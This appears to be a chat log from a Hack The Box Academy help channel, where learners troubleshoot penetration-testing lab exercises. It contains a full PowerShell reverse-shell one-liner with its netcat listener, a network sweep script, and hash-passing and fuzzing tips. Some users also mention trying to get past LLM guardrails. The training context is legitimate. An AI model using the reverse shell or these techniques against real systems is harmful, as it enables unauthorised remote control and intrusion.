Hi everyone,

I need help with Active Directory Trust Attacks - Skills Assessment. i have root access on child DC and root domain DC dc.inlanefreight.ad... I've tried all avenue to abuse inter-forest trust to get access to DC03.apexcargo.ad but no luck... anyone that could help with nudge to move forward THANKS....can DM thanks!!!

vale geyser
#

Anyone of the devs here? It would be great if you would add a "Extend Time" Button for the Target VM (similar to PWNbox). Currently doing AEN and i have to restart the VMs for the 15th time now....

fiery palm
#

Hi community i have a question, im doing the path cibersecurity junior, more or less i can achieve all the exercises of the path, but when i try to resolve the machines i can't, i see commands that i never have seen etc, i only could with 2-3 of tier 0, anyone else succeded the same?

finite current
#

i don't know what happen, probably i'm not doing it right

#

can i dm?

tranquil axle
#

You can send me what you tried but my notes aren’t too detailed

finite current
jovial walrus
#

Credential hunting in network shares..all tools giving false results..this is possibly the worst exercise on the path so far

#

Any help?

pure osprey
#

Has anyone managed to solve the issue of Applications of AI in InfoSec skills assessment returning accuracy 0.0 when uploading the model, but locally the accuracy is around 0.9?
I saw many people asking about it, but no solution so far

Edit: Use the same things as spam classification then fine tune the parameters.

balmy gull
#

Basic question. Working on the beginning of the XSS module. It says to start the server below to practice, but I do not see any instructions on where the server is located/how to start it. Am I missing something obvious?

fathom pendant
#

scroll down click the thing that says 'click here to spawn target'

balmy gull
#

Ah. Ty

charred fable
#

hi, can someone please help me with this question

Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}

Ive tried :
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

but it says Bash USER command not found

and when I try:

GET / HTTP/1.1
Host: 10.129.163.6
User-Agent: Server Administrator

I get the response with alot of text and it says
400 URL must be absolute
501 Protocol scheme User-Agent is not supported

uncut yarrow
#

What section is this?

charred fable
fathom pendant
#

also [ctrl+v] and [Enter] are placeholders for keypresses

#

ctrl+v being the ctrl key and v key, and enter being the enter key

#

[ctrl+v][enter] puts in the sequence ^M then ofc [enter] after goes to the next line

#

why they have you doing this via nc is beyond me

woven zenith
#

I need help in "Skills Assessment - File Inclusion", I cannot read the code of apply.php. I don't know what else can I do

charred fable
fathom pendant
charred fable
#

I connected to 80

fathom pendant
#

correct

#

conveniently for ftp there's an ftp command; http...well that's web

charred fable
fathom pendant
#

yes... http... hyper-text transfer protocol... the language of the web

#

so a browser can generally do the trick (though sometimes curl, or other means if you have to specify a user-agent - it's annoying in browsers)

charred fable
fathom pendant
#

but everything IS doable via nc/netcat

charred fable
#

and that was after i connected through nc port 80

fathom pendant
#

with netcat it's better to use heredoc instead of piping

#

nc ip port < file

#

or herestring
nc ip port <<< "string here"'

charred fable
fathom pendant
#

heredocs/herestrings take the string and redirect it to the input of a command

charred fable
fathom pendant
fathom pendant
#

<<< is herestring

#

so instead of printf "...." you can just do
nc ip 80 <<< "insert your text you put in printf here"

fathom pendant
charred fable
fathom pendant
#

gotcha did some tinkering and found some new things; if you're truly determined to do it all in one line instead of writing it out line-by-line dm me

fathom pendant
#

you don't specify the IP in a GET request

#

at least not in the GET portion

#

GET is for requesting a file location

#

/ being the webroot

#

so essentially you're trying to ask it for http://ip:80/http://ip

#

(in your request at least

fathom pendant
# charred fable

also your screenshot you're doing nc ip port "texthere" | nc ip... which is just breaking beyond belief

charred fable
zenith lintel
#

Hi guys
Need some helps on network foundation for this question
"In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated)"
I tried the following answer but flagged as incorrect:
Software-Defined Architecture, Software-Defined, SDN
I tried it on lower-case as well, and still marked as incorrect.
Am I missing something?

fathom pendant
charred fable
fathom pendant
#

not the section

charred fable
fathom pendant
fathom pendant
#

someone else also had a question

zenith lintel
charred fable
fathom pendant
zenith lintel
#

AHH got it now, thank you

fathom pendant
brave field
woven zenith
#

solution says it is.

brave field
woven zenith
#

seems like the solution is outdated. I'll try again after this xmas.

urban forum
#

hello, in Skills Assessment - Pivoting, Tunneling, and Port Forwarding
there are a question + For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

what to do ?

urban forum
brave field
little temple
#

I guess you already have a compromised host to do the needed ?

faint hill
#

I'm working on the "Bypassing ConstrainedLanguage Mode with Runspaces" section in the "Introduction to Windows Evasion Techniques" Module (in the PowerShell ConstrainedLanguage Mode section).

I have written the .exe to get the flag after putting it there but nothing.

||When I put the .exe in the C:\Windows\Tasks dir on the machine it passes my test to show the .exe is working.||

What's going on here? Are they expecting ||an added applocker bypass as well|| in this module?

||Post script I was using utf-16...... OUCH!||

urban forum
faint hill
#

I am logged into the target machine as alpha. This has no admin privs.
I am supposed to wait for the system to execute something to get the flag - based on the instruction.

grizzled schooner
#

Windows Privilege Escalation | Credential Hunting

I'm absolutely lost on this question:

Connect as the bob user and practice decrypting the credentials in the pass.xml file. Submit the contents of the flag.txt on the desktop once you are done.

I followed the module for the pass.xml file, and the PW it gives is wrong. I ran a PowerShell script to find other files, and I can't find anything. What am I missing here?

grizzled schooner
#

Sorry - I haven't done that module :/

mental canopy
grizzled schooner
#

I didn't, no

mental canopy
fathom pendant
#

Also module is above tier 0, dont share screenshots

urban forum
#

ok, did you understand my question?

fathom pendant
#

Are you sure its a different machine (check ipconfig)

urban forum
#

yes its diff machine

fathom pendant
fathom pendant
#

The last octet is wrong

#

Check your ping sweep again

#

Also youre gonna be using the creds from the previous question

urban forum
#

i made full scan in hole interfaces

fathom pendant
urban forum
#

then rdp to that user navigate to c , read the flag , its duplicate to previous user

fathom pendant
#

You literally connected to the same machine from a different interface

brave field
#

It's a dual-homed machine

urban forum
fathom pendant
#

From the base 172.16.5 machine do ipconfig, from the 172.16.6 machine do ipconfig and you'll see what I mean

urban forum
#

you mean that
the machine have 2 ips and users
and i connect to opther user in the diff ip for that machine ?

fathom pendant
#

The next hop is a wholly different machine on the 172.16.6 subnet

urban forum
#

i know that if you connect to rdp to mahine (two times) one of them will disconnet

fathom pendant
brave field
fathom pendant
#

Also you can rdp to yourself without it kicking you off

urban forum
fathom pendant
urban forum
brave field
fathom pendant
#

Run it a few times, there is a different ip

urban forum
#

$ips = @(); (Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | ? { $_.IPAddress -and $_.IPAddress[0] -notlike "169.254.*" -and $_.IPAddress[0] -notlike "127.*" }) | % { $ip = $_.IPAddress[0]; $mask = $_.IPSubnet[0]; $cidr = (32 - ([convert]::ToString(([Net.IPAddress]::Parse($mask).Address),2).PadLeft(32,'0')).Split('0')[0].Length); if ($cidr -ge 24) { $base = ($ip -split '\.')[0..2] -join '.'; $ips += 1..254 | % { "$base.$_" } } }; $live = @{}; arp -a | Select-String '\d+\.\d+\.\d+\.\d+' | % { $a = ($_ -split '\s+')[1]; if($a -and $ips -contains $a){ $live[$a] = $true } }; $pool = [runspacefactory]::CreateRunspacePool(1,100); $pool.Open(); $jobs = $ips | ? { -not $live[$_] } | % { $ps = [powershell]::Create().AddScript({ param($ip) $up = $false; $p = New-Object Net.NetworkInformation.Ping; try { if($p.Send($ip,1500).Status -eq 'Success'){ $up = $true } } catch {}; if(-not $up){ @(445,139,135,22,80,443,3389) | % { if(-not $up){ try { $t = New-Object Net.Sockets.TcpClient; $c = $t.BeginConnect($ip,$_,$null,$null); if($c.AsyncWaitHandle.WaitOne(500)){ $up = $true }; $t.Close() } catch {} } } }; if($up){ $ip } }).AddArgument($_); $ps.RunspacePool = $pool; @{Pipe=$ps;Handle=$ps.BeginInvoke()} }; $jobs | % { $r = $_.Pipe.EndInvoke($_.Handle); if($r){ $live[$r] = $true }; $_.Pipe.Dispose() }; $pool.Close(); $live.Keys | Sort-Object { [version]$_ }

its better than
the default one😅

urban forum
#

i try to just copy paste it from rdp to other rdp and its work!
are there other ways?

cold star
#

Has anyone completed windows priv module? I need help regarding something

#

I am trying to enter the machine via winrm but don't have the admin cred's any workaround's because working with rdp is very slow and annoying

fathom pendant
urban forum
urban forum
fathom pendant
#

if you have the hash, evil-winrm allows you to use those

prisma dawn
#

please help when trying to get a reverse shell this is the error message i get

fathom pendant
#

the rest are cascading errors because of the first one

prisma dawn
#

thats the tun0 ip

fathom pendant
#

that's the only thing I can tell you, it told you explicitly in the first error why it failed

#

i'm also assuming you have the listener set up on 443 on your atack host

prisma dawn
#

yes i do

fathom pendant
#

as I said though the rest of the errors are cascading;

You cannot call a method on a null-valued expression

fathom pendant
#

or the pwnbox

prisma dawn
#

im using openvpn so im using the interface tun0

fathom pendant
#

if your own vm
-> make sure you only have one vpn connection sudo killall openvpn then reconnect

#

and i'm assuming you're running the vpn from within your vm

#

not outside it

prisma dawn
#

yes inside the vpn

#

and my listener is directed to the tun0 interface ip

#

sudo nc -lvnp 443 -s 10.10.15.172

fathom pendant
#

so to answer another question; you only have ONE connection running
ip a -> if multiple tun connections then there's your issue

prisma dawn
#

you can crosscheck the ip tto know if its good

#

correct

fathom pendant
#

wsl?

prisma dawn
#

vm

fathom pendant
#

not sure the issue could be some firewall issues. but that looks like it should be right

prisma dawn
#

my bind shell worked fine

fathom pendant
#

bind != reverse

prisma dawn
#

im just stocked with reverse

fathom pendant
#

so different things in play

prisma dawn
#

i have been getting this error only God knows since when

fathom pendant
#

i was able to do it in the pwnbox and my own vm, so again unsure where the issue is on your end

cloud urchin
#

@prisma dawn MarcieLee probably already mentioned, but you don't have the Pwnbox running at the same time as your VPN do you?

prisma dawn
#

no i dont

cloud urchin
#

Maybe try restarting everything, the target, your vm, your host, and try again. maybe ensure your nc is up to date.

#

and how are you connecting to the listener, did you get the revshell from something like revshells.com?

prisma dawn
#

i have tried both from the module and revshell

cloud urchin
#

which module, section, and question? and which revshell did you pick

prisma dawn
#

Question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.

#

modules: shells and paloads

cloud urchin
#

Can you DM me the command you used to connect

prisma dawn
cloud urchin
#

ok so give me the actual command you ran..

#

because the one you gave me won't work

prisma dawn
#

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.172',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

cloud urchin
#

ok looks good. yeah i'd make sure your nc is up to date, maybe try restarting everything as well like i mentioned earlier. should work though.

#

maybe also try another port, like a higher one and/or trying with 0.0.0.0 instead of tun0 (although this shouldn't matter)

prisma dawn
#

all parkages are up to date

#

nc worked perfectly for bind shells

plain hare
#

Hi All, im facing an issue with reverse shells, in the file upload module: i have used the pentestmonkey shell, i have added the tun0 ip address in the file and the port, however when running nc -n port it listens and when uploading the reverse shell no connection is received. any ideas?

fathom pendant
#

-lp is what listens

plain hare
#

Any ideas?

tranquil axle
#

Upload alone is often not enough to trigger the reverse shell, are you making sure to also execute the rev shell somehow on the server side? For example a php rev shell gets executed when you browse to the uploaded file manually

plain hare
tranquil axle
#

Tbh my guess would be that you did not put the correct ip adress?

plain hare
#

I used the tun0 ip address, whic is the same as the vpn ip address

gray yacht
hot isle
#

Guys for my CPTC Exam lab, i cant see the instance i have to work on to get the 14 flags and I am unable to grab an assessor for my report. Does anyone have any information about this?

gray yacht
#

You can't share the exam environment.

hot isle
#

Im very sorry that was my bad

gray yacht
#

So since I did see the screenshot, everything appears to be working correctly.

#

You will need to download your exam VPN config file if you plan to use your own VM for the exam. After that, you would connect to it just like you would when working through the CPTS module labs and skills assessments. Your entry point IP/target is the very top IP that is displayed in your screenshot, which would be like when you spin up a module lab or skills assessment. Does that make sense?

plain hare
gray yacht
plain hare
gray yacht
plain hare
gray yacht
plain hare
#

exactly, web shells no problem, but reverse shells can get a connection back to my listening server

#

i have tried multiple ports just to be sure, same issue

gray yacht
plain hare
fathom pendant
#

the goal is a webshell, not a revshell

#

whenever you are presented with a public_ip:port -> it's safe to assume that you're not going to get a revshell. This is because those don't have an interface that's connected to the vpn network

#

While reverse shells are always preferred over web shells, as they provide the most interactive method for controlling the compromised server, they may not always work, and we may have to rely on web shells instead.

#

directly from the last paragraph of the reading

plain hare
fathom pendant
gray yacht
#

There you go.

fathom pendant
#

it's just how the lab is set up (and a good portion of web labs are set up)

plain hare
fathom pendant
#

again, not vpn

#

since you can interact with the target without being connected to the vpn

#

it's also not cloud afaik

#

just a container hosted that's extremely locked down

plain hare
#

htb VMs must be on cloud either azure or aws, otherwise running them on prem would be very expensive lol

plain hare
fathom pendant
#

or, hear me out, it's not on-prem and it's still not cloud

#

well not big cloud like Azure or AWS

#

more like things like Digital Ocean

plain hare
#

maybe colocation centers

fathom pendant
#

either way; it's not really a vpn thing

#

at least for the public ones

#

I don't think it's very public how HTB handles the private vms, but it is known that they aren't shared with other users

#

which is an overhead that's taken into consideration

plain hare
#

not to debate but vpn does have to do, for the attaking vm, , the target might be public, but the attacking vm sits within a vpnm so it must allow network access. anyways. thanks for the help. much appreciated

fathom pendant
#

since attacking the public ip doesn't interact with the vpn

plain hare
fathom pendant
#

no, it doesn't

plain hare
fathom pendant
#

if you're attacking 1.2.3.4:5555; no part of any of the connection protocols interacts with the vpn 10.10.0.1/16 or 10.129.0.0/16 range of IPs available (10.10 being clients and 10.129 being targets)

plain hare
rustic sage
#

I've already given my correct answer on attacking GraphQL questions, but the system still considers my answer wrong, what's wrong ?

rustic sage
#

Yes

ocean night
hasty mauve
#

Anyone knows if there is another way of enumerating ESC10? without having to read registry values?
Or is this the only way?

brisk tapir
#

altho technically speaking you could spot this with behavioral analysis, meaning just trying the attack and analyzing the way CA responds

hasty mauve
brisk tapir
#

unless you have some special permissions setup which allows a low priv user to query that perticular reg key, yeah

hasty mauve
#

lol, imagine failing CAPE because I forgot to try to abuse ESC10.

mint lodge
#

In the Attacking Common Services, Attacking SMB, they don't actually show how to abuse SMB and catch the hash with responder that is so confusing why not show an actual example?

finite harness
#

can anyone help me on this task in hackinwordpress m pretty sure that i checked all the directories and didn't find the flag

prime mirage
#

use that tool

finite harness
prime mirage
#

ffuf no joke

#

I solved it by using zap proxy, it fuzzes nicely with crawlers

winged hedge
#

Check first with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt to search for directories

prime mirage
finite harness
#

@winged hedge can i dm u ?

sly glen
#

Hi Guys, I'm currently stuck at HTB academy LLM Output Attacks module from AI Red Teamer Track for the skilled assessment, ig i got the adminkey for adminbot but im not sure where can i use the key if anyone completed the path please help. Thanks in advance

open violet
#
  • AI Defense
  • Skills Assessment
  • Struggle getting tokens
  • I have tried a lot of different queries and most I have received is [redacted]. Not being able to bypass guardrails and I keep receiving "InvalidOutputException. Blocked data exfiltration attempt."

Anyone who can give me a hand? Please mention or DM so message doesn't get lost. Thanks in advance 🙂

heady sapphire
#

I was just trying streamio machine from cpts preparation track and I couldn’t get far … I need to solve it using a walkthrough but it still seems hard to me . I am kinda disappointed because in almost every box from the cpts preparation track I have done , I needed a bit or a bit more of help / hint or even a walkthrough. After these boxes and my experience with them , I don’t want to take the exam because I feel I will waste my money. I don’t know what to do , I am really discouraged now

fathom pendant
# heady sapphire I was just trying streamio machine from cpts preparation track and I couldn’t ge...

This is gonna be relatively true for all the boxes in the path. Nothing is going to follow the modules to a T, there will generally be one or two things from a box that is relevant to one of the modules, but beyond that it's normal to have to research. The biggest thing to worry about prep is your methodology, having to use writeups for retired content isn't inherently a negative thing as long as you actually learned from it and didn't use it as a crutch.

umbral fulcrum
#

Hey Guys, did someone else had problem on module Web Fuzzing, Recursive Fuzzing section ??

#

need to do recursive ffuf but it just keep on running ....

vague lintel
winged hedge
hasty mauve
vague lintel
#

that's all i mean (img is like from a blog of esc9 just to clarify)

covert schooner
#

Hi i am facing permission denied error while trying to mount the share in the footprinting module (NFS). Showmount command gives 2 shares but while mounting i get permission denied.

vague lintel
#

check the path

umbral fulcrum
vague lintel
#

at least that's how i view it personally

#

i need every endpoint in this bitch vs. what's obvious

#

my brain is weird like that

umbral fulcrum
#

I usually use 1 or 2 tools most of the time **ffuf **is definitely one of them

but the number of recursive in the exercise is just ridicules for ffuf

safe star
#

Yeah that was probably the longest answer in the path

#

Felt like 40 mins

tidal bobcat
#

Has someone completed the LLM output attacks module? I need a sanity check for the final skill assessment.

sweet aurora
#

Hey! I have 250 cubes available any recommendations for medium difficulty modules? I’m looking for 1 Active Directory / Windows module 1 Linux / Web module

brazen sage
#

hi could someone help me in SOC path
Im stuck on this question
Now, execute the KQL query that is mentioned in the "Wildcards and Regular Expressions" part of this section and enter the number of returned results (hits) as your answer.

rustic geode
#

Hi , i have problem on ssh keys on footpriting hard lab how can i solve this problem

lofty turret
#

Hi, i'm stuck on Footprinting - DNS, last question. Can't find FQDN with x.x.x.203. Made dig axfr and dnsenum for every found domen. Any suggestion?

mental canopy
vague lintel
rustic geode
fathom pendant
#

---BEGIN and ---END included

rustic geode
clever marlin
#

am i doing something really bad?

#

or this just is broken?

#

i reseted some times

cyan veldt
#

Oh nvm

waxen totem
cyan veldt
#

It was the vpn lol

cloud urchin
#

that looks like AEN

fathom pendant
#

@manic dove

  1. that module is above tier 0 so posting screenshots is definitely not allowed
  2. log out and log back in as that user (closing the RDP session doesn't log you out)
fathom pendant
manic dove
#

or is it really i have to log out and in back to see the roles

fathom pendant
#

don't overcomplicate it

#

set the file; execute it via the tool; relog

manic dove
#

alright will try it then

fathom pendant
#

Windows doesn't update an active user's groups - it waits for a relog

#

(or an update)

#

active == currently in use

manic dove
#

owhhhhh gotcha. thankss man really appreciate it

fathom pendant
#

if you're doing the CPTS path, it's heavily recommended to do AEN blind though

cloud urchin
#

access tokens are generated upon logon

fathom pendant
#

just spawn the lab -> go to DA/EA (highest priv in domain)

half geyser
#

Struggling with Pass the Certificate module. I gave up with PrinterBug because that did not work on my own VM or the pwnbox. Now I tried PetitPotam, and I can see the listener receiving a connection, but then nothing happens...

manic dove
limber surge
#

Hi anyone done Vulnerable service for CPTS module for the window privilege escalation? might need some help.

can i check for the Druva Powershell POC Script with the modified $cmd variable. am i suppose to save as nvoke-PowerShellTcp.ps1 in Windows?

when i try to execute that .\Invoke-PowerShellTcp.ps1 -Reverse -IPAddress <kali ip> -Port <port no>

it executed in windows. but i didnt receive any reverse shell in my kali

tidal bobcat
#

I am at the final step of the LLM output attacks module skill assessment. I've got access to the Adminbot. I've been trying from a lot of time. Can someone give me a nudge?

mint topaz
#

Hi why is this happening the /graphql is not showing on my vm but it shows in Pwnbox this is not the first time in the web attacks module the submit button for a form didn't work on my vm it worked only on HTB Pwnbox

mint topaz
# mint topaz

The same error happened when doing the web attack module it said the function is not defined

left needle
#

I have done the skills lab of Pivoting & Tunneling module via Ligolo-ng is it a problem or should I try with tools taught in the module I found the tools slightly hard but have done all the section questions using the tools taught in the course

fathom pendant
devout lily
#

Hi everyone, can someone explain me why is there SMB on this command: netexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt?

coarse pine
fathom pendant
devout lily
fathom pendant
#

because smb is running

#

:)

shrewd thorn
#

in the pivoting module in the pentesting path, socks over rdp , i upload the dll to the windows machien but when i try to load it it gives me this error

#

after that the machine deletes the file

warm horizon
#

Hello everyone, sorry to bother you, but I’m stuck on the last question of the WEB FUZZING module. I can’t manage to solve it — I’ve already tried several commands. Could someone give me a hint on which one to run to obtain the flag? This is the question. After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag?

fathom pendant
shrewd thorn
#

thx

vocal schooner
#

hey, i can not ping the machine for the 1st skill assesment WindowsPrivesc, i tried to the virtual machine, in my computer, reloaded VPN, reset machine, rebooted my computer, changed VPN

heady sapphire
mint topaz
fathom pendant
#

or sometimes the page is omitted

#

depends on the setup

vague lintel
# half geyser Struggling with Pass the Certificate module. I gave up with PrinterBug because ...

are you still having issues with this? i passed out sorry. what's the showmount -e on for the nfs here? i would backtrack and recheck if it's still not doing it.

this looks like a typical nmap - what are you trying to do? are you running an nse script on 53 in the blocked out portion? try dig.

where are you getting stuck on this. petitpotam can be more of a pain if there's a bit of relaying going on. also, sometimes you might have to use an older version of ntlmrelayx

fathom pendant
#

i.e. http://ip/directory/index.php == http://ip/directory/

vague lintel
mint topaz
fathom pendant
devout lily
vague lintel
#

you don't even need to do --shares at first tbh, if you're just poking

fathom pendant
#

though my memory on that module is fuzzy

vague lintel
fathom pendant
#

no it's not

heady sapphire
fathom pendant
#

-p can take a file or a string as its input

vague lintel
#

i thought they put a passwd in too

#

for some odd reason >.<

fathom pendant
#

you're probably thinking of hydra where it's -p/-P

vague lintel
#

in like super primitive short

vague lintel
warm horizon
#

**Hi guys, I’m stuck on the last question. I’ve already tried many commands but still can’t find the flag.

If someone could give me a hint about which command to use, I’d really appreciate it.

The question is:**
“After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag?”

fathom pendant
#

the previous questions help lead you to the flag

warm horizon
#

**Yes, I followed all the previous steps in the assessment. I completed everything that was required, but I still don’t see the page with the flag.

I might be missing something small — could you please give me a hint about which step or command I should double-check?**

fathom pendant
#

you don't need to bold your message

#

i can see just fine

#

iirc the last step is fuzzing the param=FUZZ to get a valid value for it (using one of the parameter names you already fuzzed for)

warm horizon
#

Got it, thanks! I’ll try fuzzing the parameter value using the parameters I found earlier.

vague lintel
#

fiyaaa

shrewd thorn
#

RdpOverSocks not working, anyone knows why? im doing exactly whats written:

shrewd thorn
fathom pendant
heavy dome
#

I have been trying to answer Q3 of the Attack DACL II module skills assessment for several days. Any help would be appreciated. I have all users as credentials.

cloud urchin
# shrewd thorn bro this fucking sections is so bad explained wtf

I didn't think so. The only thing that got me was disabling the AV, other than that it worked fine. Have you tried following the instructions provided (you aren't following the instructions like you said you were)? I can see from your screen shot you aren't doing it right. Why would svchost be added to your proxifier? Just make sure you use the right app and port etc.

mint topaz
cloud urchin
# mint topaz <@206552578568224769> do you know why did this happen

It could be because you're using the VM and Pwnbox at the same time. They share the same IP, so using them both at the same time causes conflicts. Shut down the victim and pwnbox then kill your vpn. Reconnect to the VPN and spawn the target, don't touch the pwnbox, it may work then.

mint topaz
cloud urchin
#

Just pick one or the other

mint topaz
#

any way thanks I hope I don't face it again

covert schooner
#

Hi, I have tried 2-3 wordlists, but not able to figure out this answer. DNS Footprinting module

cloud urchin
covert schooner
#

No

#

But how do i know i have to try this?

cloud urchin
#

well, it's very common

polar widget
#

Hello folks

#

anyone working on the latest WMI Tradecraft Analysis module?

opaque dew
#

hey, i'm working on Network Enumeration with Nmap: Firewall and IDP/IDS Evasion - Hard Lab and i've found the port in question, but it seems that nmap's -g/--source-port option only applies to the initial scan, not NSE scripts? am i missing something or off track?

opaque dew
#

hmm i got the flag but i'm not entirely sure what i was meant to do. i ended up using socat to do what i thought i ought to, but i'm not satisfied

bright quiver
#

Is anyone working on the ai red team path and is on llm output attacks and wants to pair up and can provide some help?

magic lark
#

Hello! I'm working on the Pentest in a Nutshell module and I've been having general issues with the WordPress page.
Following along step by step starting with Low Hanging Fruits, I'm instructed to visit the :443 port, but I'm getting a "closed the connection" response on edge and PR_END_OF_FILE on Firefox. Curl complains about a self signed certificate that I can bypass with -k and get all the source code. But now I'm at Linux Initial Access and MS is saying WordPress is not online

#

Full disclosure, I am encouraged at my job to continue my education during down time. Is it possible this is a weird interaction with work security settings?

#

I can't imagine it would be since this is supposed to be a self contained VM?

rotund vine
#

Hello Im working on Windows Privilege escalation module [Interacting with user] and got stuck can someone give me some hint or provide some help??

fresh vector
#

is anyone else having issues accessing machines?

coarse pine
#

what browser you use

coarse pine
#

but..

#

I don't like that picture on your wall..

#

I think you should get some help

#

sorry I can't help

fresh vector
spring viper
#

hey any chance I could chat on the Elastic Net. My best elastic distance constraint has been 2.1 and I am having trouble getting it lower

jovial walrus
#

thx for this

mossy knot
#

Hi guys, I am very new and still quite stupid when it comes to technology. Can someone please help me with "Connecting to the Windows Target" in "Introduction to Windows"? I know I need to connect via Remote Desktop, but I have no idea how to actually do that. I've looked on YouTube, hoping that someone had already dumbed it down, but it seems to be skipped over like it's common knowledge. Any help would be appreciated.

fathom pendant
#

I tend to also add /dynamic-resolution and /cert-ignore

mossy knot
#

I feel this advice is still to advanced for me... thank you for trying to help.

Edit: I figured it out. I got to the stage where I had access to the target, but for some reason the task bar on the home screen was cut off (which doesn't seem to occur with others). I ran out of time so couldn't finish the task, so will try and finish it tomorrow.

sour snow
#

Hi, I need some help with impacket-smbserver. It doesn’t return anything when I try to use it.

I’m currently stuck on the Attacking SQL Databases module. I need to execute the following command EXEC master..xp_dirtree '\\PWNIP\share' to trigger my SMB server and capture the hash, but it doesn’t work.

I tried testing it locally by opening the SMB server share and using smbclient to trigger it, but it still doesn’t return anything. However, when I try the same thing on Pwnbox, it works.

I think the problem might be with my local impacket smbserver, but I’m not sure how to fix it.

tranquil axle
#

My notes for that section say (as you already discovered) to use the trust account and then use that to enumerate the new domain with bloodhound

tame totem
tranquil axle
#

You can try but I don’t have super detailed notes on it

cyan veldt
#

I’m not sure if this is the right section to ask this but, do I need to learn C for the assembly module ?

#

I’m planning to take CDSA and there’s a malware analysis module that recommends to take asm module first

umbral fulcrum
#

Hey Guys, did anyone find a C# module?

novel matrix
cyan veldt
novel matrix